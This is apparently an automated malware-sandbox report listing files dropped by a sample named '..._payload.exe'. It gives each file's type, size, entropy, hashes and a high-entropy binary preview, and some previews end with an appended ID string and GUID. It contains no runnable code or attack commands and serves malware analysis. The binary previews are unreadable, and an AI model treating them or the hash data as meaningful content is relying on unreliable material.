                                                                                                Preview:10/039.1.........@5..R;R...$.GN.....|...o:\..jldsr..:C;.).U........R7..\@...m).....:.F,.bgm`3/m.sQk.=Y.o..S.F..F...vGyS.....(F.O)..-.#.G..c..h.?..^..Z...mN...q........{.:1I...Q....Z......4c.q......@.^..^R......!..{c)vK.7.>T#].........E?yZ...w^...g.w.. <...)$.?......C...)`.HO.-....v.....r.o....:...d...k"24...2G.....(..nb7...5..I..u...g.!..+A."...L...tX.....guo....!..;XW3.A.....$u..xN...omb.4...zm..;......N..?.K.m.............&...n4......,.....i.~o.......UC..X....1sWD....<@......A.|Krq.....@I...u.;....=e`...i.5.LL&&.\.^.".SdX...:Nn.....(....B.&...[*.-..R.H.5.#.u.pl..5+.....#jbx............At3..A.....3,"..7.3[.. ..v..n..}v..|..?(.......~.J...z....q..@.K.)..q...!lM(....u.....*e.(.....f..z.=..(1]....?.T.<...Q...V.....eS...k....K..T.A..'....cL....h..#R9...-..GQ..,.....l.5.. ....0.4..3\.Cb..0I....2z.....vc.i.R..J..)cp.0....(.4.)).......|..03.x..y...V.lK.+.....G`..z....>:.<grX.......1......2.#.......k..G..V.r...:....%T..J ....n....c..6.+
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:Unicode text, UTF-16, little-endian text, with very long lines (416), with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):834
                                                                                                Entropy (8bit):7.729233690654056
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:QLqz+BrZi/V+//j3KPMVenE41dzT+uHyYww2eI2Su4X6Cx3bD:qpB9gV+//j39b41xPZwHJamLD
                                                                                                MD5:BA462463B7551BAEB20EF75AD6DE192F
                                                                                                SHA1:8BE7EEEFE25420EADA59E6EAADBA964C10BF0725
                                                                                                SHA-256:4E12C40940F82DC7FA3FEEB619FE893D2F9389CC98966456B3FD357E17977683
                                                                                                SHA-512:33F076035710298D8E8616D5BA531627F04673AA403E22FFC256E9F770B7ADB0E2BF72867DFD09472BC7ED85D24C76BA50347B788506548FEE2E9AB40DEDE540
                                                                                                Malicious:false
                                                                                                Preview:..1.0x.........O.EG;.A....".W.V....l.-Z.9...8./5..OJ.z':_!...6..&p.H....{N.;.b......n...;W.+."..`7..CCV..CBk,.W.....5j...v.J8..=uZ...v&...\i.m..^../m:o..@V.)-...P.3.}.2.a..EV!..!.."..?..b....T....HAV.!7.Q.@.k...+`NXjL\.F.;L.k.KV.;...b-z)*%.n..u%.`..%p$.S.k..d9....q.Vj,.I@.........?..=.Sa.4m...Q.~.a.....6W<....+..B.R..Ij...j.|..&O_.#.~.S.>L+].,a3s......O..f....}(...3....k....<.Q...S..w"<..H\-.Nk....~C`..9=..........GP[..'0.4...vD.,S.._S..}..&...h.....KG_.V.V..K..1..{..vw'...k).>a%.w..2dDCf..-1.~R..t..z/.7.....+.k......{l3.......H....X.S.../..8.M..=..[...X..9..d....Mq(a.."E6...^...h.-.s.].a...xZ..?..0.ken.E....{...#*O2N.ml..?..zg2DV.5..S.SY=8E..N2....l....Z.o....\..`.A`.#'*;^.......<e$...H.;.K..|.....S<.BUcuB8PRg0LNi380axIJs5BS8nCUdeo9U88L2Lt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:Unicode text, UTF-16, little-endian text, with very long lines (869), with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):1740
                                                                                                Entropy (8bit):7.874671418995068
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:lQxLEpt1v2QGUxKLK5VzEA/3PXHnA6XpxDAQXtChRPFSLD:lW4ptvGw0Yt/3PA6pZ1Qdy
                                                                                                MD5:0D9BAAD508372F05D7C2F2505A760FEB
                                                                                                SHA1:C13C94AB291A471CFC2CC087C7BAABAE09228F98
                                                                                                SHA-256:2E18E4555B6B6EDC38F602FFF1AF7D69C27AF04A84FED07D113E9CDD4AF56F63
                                                                                                SHA-512:77F211FD3E1BA082911FED1E48BDB378A5A1E7A0062E5DB3C57F5722EF92BB63DE18A453A1D9069EB35A89D859BF917E6BFB2794BB9D336CB73AD7BE2DAE4866
                                                                                                Malicious:false
                                                                                                Preview:..1.0&9n.l...H..g..Su.1m.....E..C..[Pd.)4WB...{Lq......s..&.....M......A.V<...l.....m8...^....fz8.`..,...x.@..v.&m.bk..[...c..9....Gs~.,..!@.2cu.........%..#..3.u<*.3....&.5.y..V.4H.......V=. [.Y...w..&.........I...1..M...A.y..E.[.g/....G.!F.7....-v......yU.|._e.G........2.R..#s.C...N......?.e.".`l....:.{z......!.}A..M|..0.k...af...u)Q..tc.&.....{.<[.xKf..d.o...W........&..S. ..D..o.%....~.0M..MC1k...V.....\../V.B>r0.R..I.y....4.d..........C6m.x0m.fw..U.f.(tx......)u|0%..3....S..OO.t..\.[....O..qT.+..61..Km.S..Y....bOZ..&....<.b]..~XcI... ........v.......?q.......vFh.f.i.j..#Q%G....n..dv."...W=.......n.0O..P..\......=T..Y....|.9.f..LP..{v...QU.^.qI.q.Qcz.....9..`....(.bL.y.h.h!.QI...*)...$...5..e*.b>....].J...,.r...M0t..........L...M......{...}.f....N...^.<..WV.7...;.al/v....'.....i.GX.3.....'f.p.f.~...%..!...@...[.y...~O...=.....r.r..i}.q.Zt9.4....t....}.b.C......Tp.`..........A...........Y.{.u../..5'..j..u,%.VU.[P..=K|...$....
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1378
                                                                                                Entropy (8bit):7.86362400110616
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:q2/lRA98zP/t/MKyoxRkeQCopfJ6GKwnfP25FC7PV53CD+NyLx3bD:ZA9U/t8ox66Zdwm5g76qeLD
                                                                                                MD5:70A155086A4D01A46C5CFB74F9C0914C
                                                                                                SHA1:53B5DEB8C853ABAC9C4B3EE2514C9A812B430633
                                                                                                SHA-256:5541CAE41AFFD8272F1272B21B15614B041CDF2AABF02224EAC46943CA91487D
                                                                                                SHA-512:FBDF1AD54DDADDC41A9547C193D8CC30F7D21B30E682CEABD1F1A22CE7D8F088FFD945173978F701A0A740809F8245A713F9F9D5EBFB4071C7DA6F4EF3DAA901
                                                                                                Malicious:false
                                                                                                Preview:<?wpl....O..@.N?:.T.7I[9+..1H......;..@6.R_SjT...b.<e!.&.v."v...7.~...!g..68...A.@./.....eK...R.{......9.Ji...Q..."....q..Q.....:e.&am.p". ...#.P....j.w....t..S.C..9...}T$.5.yq......<.4..T.cB....].!$.iW@O.W....8..C|.?.G.b..o..98..oL'.....lG....=.B...a/}O-...K..p...LX,......~}.{..lv..]....4....n....O...y.$U'..<.........r...Tp..y..|.|...I.~...~@....G..... ..w...Y....J..o.z.v.V.}$ T.Hm..:(....:..........>..uV...1[......'..N......7@q...0.8.r..3;\].%.....(...}....F.b......%{.....m..t..q.@jx.ic..`Z.....6.I..!...Oi.UA.o....4q5...j%....[.....O..J...|...`*.Gw.Z...+<.....'.tx.......0".~.w..$.k..'i.-).P...7.{..dy..?....;!JP.m?_.xL.|.....T3..+.?....Wd...H........n......C......t.....J.H..n......r.-....=.w.....:../>.YGv'.<...8..%8.I..go0...N...<Q~.y.3......cM...W.A..R...b.2i...........mH.Og.3.......n.n.T.l^y..R...&....m.!.l..QzB..Z{4S0........Zx$|..Q.e...Q~@..../h.&L.|....2.n.v[..Rk......A..}C..5{3.H.....X. ...|.....\s.$.....
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1613
                                                                                                Entropy (8bit):7.846251568569658
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:VjG7cIz1XWHrJO/NL+GqZGW7awa15kRLD:VjLWXWtWNLZiGmatz+
                                                                                                MD5:27F64E495D61AE69F0AECC15CF293B32
                                                                                                SHA1:04CEF14AF2716433D1E9188AC678307120D27766
                                                                                                SHA-256:80EA18CD40CD1E536DF247EED698D7C88C1F031F04A2F70CE2B05F15B546EF23
                                                                                                SHA-512:FA7E748B5F6A2AEE5D47F1B36689D138EF07F79D6FC9B8281E6510AE8844470CFCCDE5D6862B060C8E57FB21FE798E9C91C7526C0F0D5C3A8EDAB015B20044AD
                                                                                                Malicious:false
                                                                                                Preview:<?wpl.....FT..:.p..(.....a-.....z.G....Gow.._=..F.V".[.!X..;....#r..{....;..6..>../w.Jh.3'..........R......N<8.2.T.:<w=qHN1`.>......L..}".k .(...q...B..?=`.....J.@. :T..1....Z.1..y1..Wo...2....V.3.,Q}.V..<.k.^v....j.S,..!...P....'...5.....}..@...f.->...t\.. ..1E...=../....P..8N\.y.!.......E.;hn..Z.0/a.bX..t,...W....<Z!Y.{q...2).~.,..6;...9..-.z...;..].B@..w...W....GW}...,..AEe..1.]...h..X.wg|....v....G.3..Gz.q.U.e..n.>m.!...P...<^1.9...aTy...w5.......E.{..[...s.-hC.h&.....q...x...w.......q.G8.W.....r...w....Qh.l....py.2<8..{.)I...`8..x....$-w.^|q4^..'r.B...V...,!tZ...`R1.}..b..m?.-M...XE...Ja..r<l.Uf.P...L....*........7h....L..9K./.!TD.~...d>.\.$..Pf.(.O...u....>~@....<..@.#.3.....)4Z.._.5.Qi..^....\u.I.U.r.x...0.4C.Y.`......7W.z.%....._|...M[..0Ci..o.08..p..p.W...`r..u..f..rB.Q/.P..83......'...il......9..o.+-`..v....ew...h.c8...QnYKu.!.6..=0.&...u3%...Z@C....e}...r.^...}.h....Rt...........`....Ix!....]k..@vV...........B....X..e.W.q..t[
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1601
                                                                                                Entropy (8bit):7.87411902219869
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:KiVTS4ij2I9s1omt02IOyreb0fXEmF5EXeD7Zvciz2C0PljLD:KiV+4ijl9sqmD6eAXEmXL7ZvcRh
                                                                                                MD5:8175D9A99F1466FEC815A4F6D1D027BF
                                                                                                SHA1:3A373F926E134EF25E610C22B78946E194654E0E
                                                                                                SHA-256:09BDC62785F4EC3204AB893E91B36AA75CA1D85A7459C051D3CC3D0AE883DAD0
                                                                                                SHA-512:BC1CC1B26E1377B1B588C6FF1061FFF40C6701746D5201F95901C8A42D6F6F71C59A46EEB046F1D377307C095715E61B814EDD8C05C8DBEC15E7E6E06703F0FA
                                                                                                Malicious:false
                                                                                                Preview:<?wpl..C.X.GP.o..P......^b*...?..>.....8...G.<.i...yL..o.,.L.].5).....9!..x....._$B6....W.b.t.."l.a.............5L.^.kA.>P..'...O.CiA...i....7...W..../^...`J.nm}..C.)...$.....ue[QW..........q.....5...b..B..v4X.;....l...H.M...kw.@......_..<..h....._.bUT..LC..z.e+ )V\O^...!".. .L.....c......:?A....+Lp.......H...<`+.D..nD..<+N.f.F...tl.2.eD.Ou..'.n...9........d..X..J,A7.h-&.....x.#.EU\..&5..\..$j..S...QT..YG5...%.....F...Uc..y...&..KR...Y.j~..od.b]....(.M.....A..k... ...(Q8..]$^......PY....Y.a......O....z..`i..........9.&->FZ6b.Y.....d...i..rV.E..,.Z./k..[.%..Z*.-.7.......Oa.W.O;.u..d....d..vIc.....0=...6%y..t5M..P.H3.....U++..Y*..qO~.^... q....<w...3|..PKP..n.y...b.......m..N+S..B.7?8.&....t.._...F.....H^......k.2..I.*2.~..r20z.......%FZ...W.#.........}..p.......Oi&j]\.[.W......?(..Z.]...~e.j.1............o4v......m...U.8....k.(3...T......l#.....A;e.S.dr'....~.....Z.u.......t....4d.5Im.h.s..C.AB.. .y>H...M.)..5..B.t..e\y...x..w..Wg...n.
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1618
                                                                                                Entropy (8bit):7.879022822824243
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:uNIyQ+6xNuFRMcMRxiVe370RPddHAO9LD:uNbr6xNuEcMR0VQSzT
                                                                                                MD5:014D322FB73C9F1E3C7B83A4389480F9
                                                                                                SHA1:FBF4D7C5AA892F542E629F40515FBB22E0B4BB21
                                                                                                SHA-256:A391207EE72F41732880C44EB6C3957072951431B3EFFBAF421A853D3C8EF532
                                                                                                SHA-512:A8FF9A808C566CD54E26C958CD85BBFFA064BDA623FA8463F8AB9519EEFAA0C142DD9F13AF6F73A428BE993E37C85EEB42AA623DD5C4B67A07C72EF22950A680
                                                                                                Malicious:false
                                                                                                Preview:<?wplF.......<..S...QLM..fXv@Zp.m?qpCj...Y...F.[_...rEP.7..n.A..G..TQ$..:hl.G.....D..,.b.K....z.w.I..j.X...+*t.....$:..+......If.#.8..)..H...3..qC.r.......l.NFt......Mh.-C<..Vi...3.."Y.......a......F.........b...f.....t7..l..9Zm.3k.....K..Oa...:.xGpy/..d"*..x."#8...R'.9..2:...2t.........,...5.....`3...........v;..Ej..:.9....6.q".G.......z..0.c..2D......My.@......-....(__=/b...G..k.....o.........&...W.*5...cy..'5rqX).ug....H.c-.-;k.B.g;IS.[MT..>..'.....}....O..E.x...k..~..(R.t].P....w.v.........H1..!q...bM.G7.J.?*..3U..X....g,q....R0G......;.....C..,.c4x.....cx.m.f.=a..@a....M_..?.?@.B.c."..7.O...@..=-.f...q.x...$K3<.r.U......Q..R.yhX.3.x.I......E...|..d@.;.....p...J......E..wrDD x6.f.SzA.t?.n......W......W..;.[R..?.....P&.0e....~...$.D.`..>XL.....Y...^.........zz...|2.9.............rs.=.....i..Cf$...N .P..Q...^V.d`).oc..b.2.."9.B)D8..Rw.X$&O.a........7.y......l.|P..R.L.&.......nB|.@>-....tP...]W.......l-]........^..........4.,h..
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1131
                                                                                                Entropy (8bit):7.818149948432772
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:j6DDG+VJdlfyAlpqYStKGbArmRRrG2/DDyQFFND7oXMx3bD:jWDGM/l6AzzS/bArmRRC2/qQxIYLD
                                                                                                MD5:C91ED8A3E1D1CDDAE0F637A641C3B95A
                                                                                                SHA1:6BF087BB63F5AA501C5E12E2B920014B64F35BF2
                                                                                                SHA-256:3BD990E20CD015175467147F588B322E5F36FC88A4DA250A690BE3C9FF5406F4
                                                                                                SHA-512:39E1B7EF9D6E89CAF007138E38FC82AC5F3EE9EB34E1461F5CD8578EF122985D8938FA780C24AC1A5834DF9861E9388384874B44692F8340F7DCBD33BDF85EB2
                                                                                                Malicious:false
                                                                                                Preview:<?wpl."...x9.%.'w.\..\....YWv....i..n.....,8^.......3..,F}..Ze.[.E;<.....v.~.F....c-.G...M.Q..T=...T..5.W.J...9C..G#TA.N.;\me..^..h.u'.O\...jX.B...7..`>..+?..e.?..?\.i\S$.)@.5TM..........t.)..1..T#{/.!........JZ.~..+....p...'.;^)C...=.<a.'......A.v..#.....M.#.~i...=....b.<.7......jZ.8...9n...V..ubc6.Y..Sd$...O.,.D.TN*.b.... ..j~..@.o....].?^..Kr...0.b.+w.......J.....P.................*.......Oo....d|.s.o....]u}...p.......;..x'..:A.C%G.i.L..%X...."..-.x......9N...g#0..5.eh._k.5....|&.c.c:d..W..G.<+7d.Z.9..R......:p..1&.z......D..W..6ed...im...>....Nw-............X.I......F..j.PMm7~...HYfI..e.*%.......7...<...%+F..h......\.<>.....I..|"N1..Vu....Q....7..#V.8.[.<Z..z..e.s.D)<z...q[o.'Y..I...KM........u....]..:.(.M.Q..x.p.#1,.0aD...8.._kQ.~..{...s.....l.N.+....1.`...:....B.;0.I.<.,.....F.....@.8.Eo.u.K............9%.t......M...,...-...j.tFQ..3..... .&^l=....2.z....3....R...0..K.p.$~t..'.T..e...[.....q..Mn.6.:ee.v1@....H.........{>
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1119
                                                                                                Entropy (8bit):7.839727665874296
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:wiRooo7HLjRUnnz+XhZ9UnnaxmqwrkxeiDimvi6vup6KJivx3bD:b+ztMnz4hMaxmJrkIfmVvaJiJLD
                                                                                                MD5:EAEBEE95CE56F13E2FFDA50DE507E7F4
                                                                                                SHA1:A7DBAEB6B156F625725A8ABD6159B14E6FDB733E
                                                                                                SHA-256:B70AE5C93FE5AF792690EE57BC0F7EDED402484765DF60DEF6D44F1EE3FEEAB5
                                                                                                SHA-512:5FC71AA7E5B1B7B34395569878525D785111E1A8383FCA00E2BACED33F1BE7325D390B39565BE6B84400BA9148F710AF13E19AEDAB22CB9973AA2A93BF452E5C
                                                                                                Malicious:false
                                                                                                Preview:<?wpl6.d.S.Y...O...z./D,}NP.x..*..wW.s.=...\.8d2....<e.F.2.Y_.....]Ck.p...L...+....Lv#..=n8..p+.?...A L.7...i..; ..J.F...X/.....C..I.+..1...W\..."k.)o....*6`....7.w...?.a{...c....VAnIsDk;....D....>.@.."...[.....d.N...~j..3G0.[....7..S.....4.Oo`f?...j.w.%.V....Q6.FAMX....(.....$r.P~1F.^#....h..6.S......M.........`.V..,.e.Ng...l.p.[&X..:..t.y3.EY.vFr1......A../%.y?Y.]d(,.t...;...k..bKi(..*x...^.hv..........a.1....`.H....Q....1.Y..t....|....`.|(Z..;.y...7O.f.$#...]&...m..`=..V....P.5..._....:V.o..qQ|..u.-..F....I77.=.c..U.....g.....;.7.px...W..z."Q.%4BG...A.OsGH.G.C...`...P'..7W.2.uE1......D..........^......k+.......A .<|.....Im0i.?....Nk...O1.TU.M.S......S.%0....N.iqW.%nyfu..g..CMT........D..u..h. ......@J.2...M.h....w..z.8\}._....EF{tRc..Y........._.A..)...A.y....f...dk...M..".d....*...`..y;..mr.f.Kt....MX.^-.R8.A..Z..G.!..T...9.|....suh[...x?..:..X....!......I.....}.......OI....V.......,...D..8.eot...;....~...;.....9J....Tl
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1374
                                                                                                Entropy (8bit):7.833056361537698
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:pob4wU2+1xCDQdljluiTKMICqkyAfrCtYKNmbG+oieI83WmBrgx3bD:4UhNTlumKMICNetYPa8eI83/4LD
                                                                                                MD5:4C82E4FEB3F27E0EC2E3FFD899A275FD
                                                                                                SHA1:8DFB3BAB001CA44A1C8C5287C48A807F9B662E25
                                                                                                SHA-256:EA7E37ACBF0FCE5AB941C04A194FE2578807F7A5B7312E52491459944DD2C2EC
                                                                                                SHA-512:1FCFFB0A9F3A1A6ED02DFA48F597B6C53C398CD30A6B599D5D79A00AAC56A2E5B6DAB9B5AD3B48C486F8A5A63C37B19DEA8F86EE51235706EF705E0C1D406713
                                                                                                Malicious:false
                                                                                                Preview:<?wpl.iH......ttT......-.._.......f...#.....x....~..}|p.....g....#'.:6.0<.n&bs...@.*;1QyT.7.............\1. ...Xb.....Li!.....S...c*.....BTm.|....m..xu..8.....?..q.8E.Q6j*M....Q.R....t.@.l..y.l.QI...Y>...u.3.U......j.I.D.6..Q?..:%f.Zu{.Q..1.l...#.....P......W..d........2jW.4.....X....Mt.~..0K.1.Z.......epb$...^z%.....S..u.....6._h.=....../..!U....uB.3....G.i.......!....@.0i....1l.[!KC~.GB2.....[.<....nA.. m...`..'....U.FA.h.^..9..Z.....n.....I;.|.`..v.f..J..$./.,k.)...n.t....8.....>..E..w)K|.D...2.....k...$.S;.\-.!.....s.<)....PJ"z.Z..N5Kg.].3)t.(v..../.-...t.<.^m.A%@TW...U...ut.:N.;..[...Sb.+.D.)...f.I:.`.=1.. lO.|oZ.ME..L...o.G.n0...T'PY./.x...V.....r..n.....\...%...<FGZ..._.t..A.sP`.hz....p@z.........\j..N.mFz.+....-.....w......x[.|0up.bF..]L...lz.-.H.....6..|g<HGoh../i[~Rr....|&...nHF...KF...|.........v.9.).`P.U&...v+.Cy...T.6rEHeG.Ll....=....j.....*.Hv.G.t.@..1......*p..o..d.5%.y....s...F.[?zS..f.....UJv..R...>A[,m.m.Y.i.v
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1354
                                                                                                Entropy (8bit):7.844779931769245
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:EhOC9p725mHbHPQzBM9AaSg3MsOurAz1gpBnqg6blcHcikrgoTM3/2blTqCCxSN3:EhOw7HP+MkITE+Bn3weMrg0yoaxIpXNn
                                                                                                MD5:1F54C4E5203722D198191FB2B0AE51B7
                                                                                                SHA1:895060CC192D99E5FEEB48EC01170196D93EA68F
                                                                                                SHA-256:1ED042892F763CEB141EA9636E027D71F1CF40B1B1BB514C5FBF7B9EAD7FC6A6
                                                                                                SHA-512:68898CEB1FAB24DA484359298802FDA249BC33D5F6538F8F9AE7D28863DF70E39C38504F8767B4F7CA71BB3320ACC884F87970F9E175CAAD88F2D2E823F90FF1
                                                                                                Malicious:false
                                                                                                Preview:<?wpl1.....S|..^..{?S\...>_.....N.H9K=t.K!..j....[`:.5.;..t)...K....*.cu.-..x..{.....w2.j.D.4.U3R2Y..RM..d...X.a.(.........%Ob".4*MF....>.............s...O..D..j.F..J..E...!uP.;?.....;.#....}L...^v.g.1L.U.h.4...M.a..3..:}.,.......8..`[M....B<.H...KW.$V....>y._:....(.p.......Q7.Fq.U..5..k...J............y.....Zu..b4_0..5=E..C\]A...o......8..[.?..........j#<...A.uMh.......Z..\.nl...8.......L.0.{.k0z++..&..2.&<.n..z...L..l...F*....B;..o~...$....w.R.O..r(.......`....u....<.....c..$-.l.....{.A..q#\?..[W3....,.....-ES{..].X..b#....<.._Kd.#8...{r..t.../<f..7......5.Y4j..]!.b..y"..s..8..63...~.<...~...,a$..$N....<....)+.t.4...U3gj...J.S.....P.@..D.7...1................@Qr.>..B]/...>.d...k...h\....^.l9dW.....EY....#.)...4<...!...`.....'......A.6+e...........#X.hLI~.....m\'...W.F..:..6.g...[.=..f..".U.....q....w.KM....1.,.8..6?.....P......u<.N.9..n.#....f+.xO;.....x@..2 .4!.........Q0.R.Q..^......i.C.-....L....a.&.....Q#...,"."...h5..l.Q
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1359
                                                                                                Entropy (8bit):7.847452568421332
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:XcLH5Vn4gXq4+GTsHSNYvTvvO/DAOwHNmkypD0MVRXuc2HeO0rLBpI1x3bD:sLHXXygsH/bO/DAdtmtG4R+c2wfyLD
                                                                                                MD5:C9FD9645A25FEF2AA42B765E1D5B907F
                                                                                                SHA1:733FBDEEDA43EC60C0A5AA0D748DD9FDDA07F7FF
                                                                                                SHA-256:0DA5C169F9083DAD12A3A465B85A18923FA5E2DCF5E0031892374D82ECAD0F5F
                                                                                                SHA-512:284CE8B6D4A1706B1F1DCC25E6EB4C9D69F9C80B6FF64091F634E5C7F26253081819E0656939C4172A144F3BC428B47541BC92BCD929CE382DA6F015E03CE80D
                                                                                                Malicious:false
                                                                                                Preview:<?wpl.+..~...M....Ri...`V...lJ.<j..a....,8....Y...<..GJ......@...k.>Q.."...r.G.>.e.e[...`.E..1..$....^.....,4uP..G.....7........4w../....s.O........8\..i.s.0\...u.).S&..e.f.z.,...."{.i.o...[.v.>'3a..kA-i.Y...5..n.....m..%{....|=p}.1......@"..A.L}.H.-.8.r-&......_...r.R.!7.yt.r...l. .vK...)B.+0CE._w!..,C...)..I~+`AcCgA........PJ..!$.J"....F.T*A...#J8;.A....*.V%.dK...|k .N".4...c..E3VXK#.....).{4.z.aE2.L.K"2Ka..Q.%..Y.6.....h a).}S.......nF..2..Mda.........CY..!%.~..c.=(...U....!D8../.h;E.1..WC..'=.7h....H...3.i.Y.A>.....@...3.V#.@$...E"...?.M-+..w+nF%...Y.E.0..pAG.I!...V)SQ..F.*C[]....6F.R...aG.R#..T.D.H.P....AO]...(.8..X.....s.j....r.2.m^....T.|....0W.h.]...:az..9...f..1.}.oz.....0.......@.c..U,;B......L.....j..d6.....*..s.....[..|..N3......O.n.....`......II..r..*..f.}..Ov..A `..4p.....8f..S.K.....,.......9.....$M(....w.K...5...4"IrQ......c..E............._..m...Y...}.^..QH...bd../.A...+.|.p.(.h.....5w.`.&..R.1..F...TR.D...
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1397
                                                                                                Entropy (8bit):7.857714968025531
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:8OeGulJ1KYcUJmNY3wqDXzqsgMfuu1vOJBnvh4ObLotc/chPVzsgvwcWMx3bD:01KvUwN0wY5PMV3by3JBvwc3LD
                                                                                                MD5:94B66355FEBC67DDF5DE6F4288E2DEA2
                                                                                                SHA1:15B6E4152F12D7C60607ACB6CCDF607506B0C632
                                                                                                SHA-256:A3155C16D973FD89B9231881B0B6B57210E43B12FFAEC730A1247AE97ECAE3F8
                                                                                                SHA-512:208EC7244035719B14D933DD16AD55CFCE0ADECE19F9F17396CA67D6A738C0665AB3667AF17C88E72A28031F846D69C72DABA36999F0DB0B6ABC2F73EA5FF2ED
                                                                                                Malicious:false
                                                                                                Preview:<?wpl.D.......\...<w~...}...>.......x..(.7.T>.C.\..`..3D.9.....Y;...p.h..........JY...oB..TD.p...`.O.Yx.Pw.6.C[.'...i....y.=\h.M.l.1....;').#`.w.L.H^..4.B,.A..Y.b...x-..FZ.-..)W.m.)sT..z....._..$..d...3...r..IA.. B.-.>zx<...-..8!.......6..w.w.....n...,.A...$....... ..._g....~.z.....d..!~V.......NDP.JA...csd..;.5h....|8.I.c.......{ ....bX.c.. <.Lu......6.q%....ec..B........p..K..P8`.;2.s.F...$Su.]Qk.l.._i...A7..B3.^.....k9y.S8... wy..q.......To...`D.%..4......I.T.o....-.3...&lH..X....d.2../.!ers.._D8e}B..&...([G+b....j^6.ul7.4...&.<....'D.K.i.P.=.t....Jm...O........*.......@...Z..{B..#...o. .d..@.t..=0....7N....i..+U.GWl..i?8q...?..X.R...../.6......|..&b.X...[;..Jrd!jK...o..u..M*..A...*...k....+.?<..v.4%F.U...w...v..[N..).........|....9. . *,c."v...........0.0....k.....{E....;c..n{.g.aPP......%.|...!/.U..R=....y.M..j.d..w0..qI.....C.L.e..t.....m..zSD"N..3........j.b".b...d..wZd.....~..kO`..mE..U..[...<=.6...,..(KJ..mX..M.J.........d...c..
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):919
                                                                                                Entropy (8bit):7.732601298364422
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:twkOCVoStiHCqNelVpK/syryWKtVc1/B9+x9kL4e+ny72sPSgnW+jeOHggJc3ciD:twjlmurgY/3ikL4ZyZW4Hgx3bD
                                                                                                MD5:76B1A6D38E4E09D75B3D169A67E12044
                                                                                                SHA1:DCA6F10B013EF8DD891B997BA42A54D7FD92548A
                                                                                                SHA-256:AD423BADF7A7D5EB880DECB3A31C37516DCFA612FE17706F636B4FF30FCBCC83
                                                                                                SHA-512:6282C169E406308CB23275F8F8291F796519D6EC04C4592FE2620A9C4D1D6BD540EB54C90D4B97B61E7AE8C71669DC837A5763136F6C8EFF11AB47E0B83B342A
                                                                                                Malicious:false
                                                                                                Preview:<?wplR0'L........Yw.l.^....U..s..J..*...<FdN.H.r...W.......x.....O..])..xu.e.]..~.m.......2.......0...X0.E...+%..;....Vx.....Oh)... ].<..jc.,.:..0........9c.v..$.d...q6.3u....O}..C..0ciB3.;...El...MPt.....9...J7.R..q.0.x<,.......,.r....m.......I.v.@.4....f\s..,Qj.?n.E........~K..akg.thx..f9.mW(u~._...&4..w8.y4.zm.N......d......$...xB.6.1.{.l....5.(....V.}.+....rA..Mq..%.6..M......XQ......9.X.3.._..."a.SQQ.;w.7..h.,..1.;.x.m).[..S...L.Z^.3.!.....1.......K..G0-G...$.s...6nC...pt.Y.2..-.h.Xp.3h.....>.c%.F...wz.....Q....B.ij.rHs....L%....~..|.*~){..g..;4.C:...4..rD.>]...&Q.Td........."..cE...l./.z.dEVM..7u."Y.|&.r..g..rvv..~...]F..a.x@.".C|MI5(.]-..C.....,..x.e.}+k=.-w.G.7.mi.l.cF....^u..q.<....b).X.....n~.5n...m.`..FP^.BDX....&.,.a*.S...#.........X.9....x.o....,-WF..w...1....G0L..c..t..PBUcuB8PRg0LNi380axIJs5BS8nCUdeo9U88L2Lt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
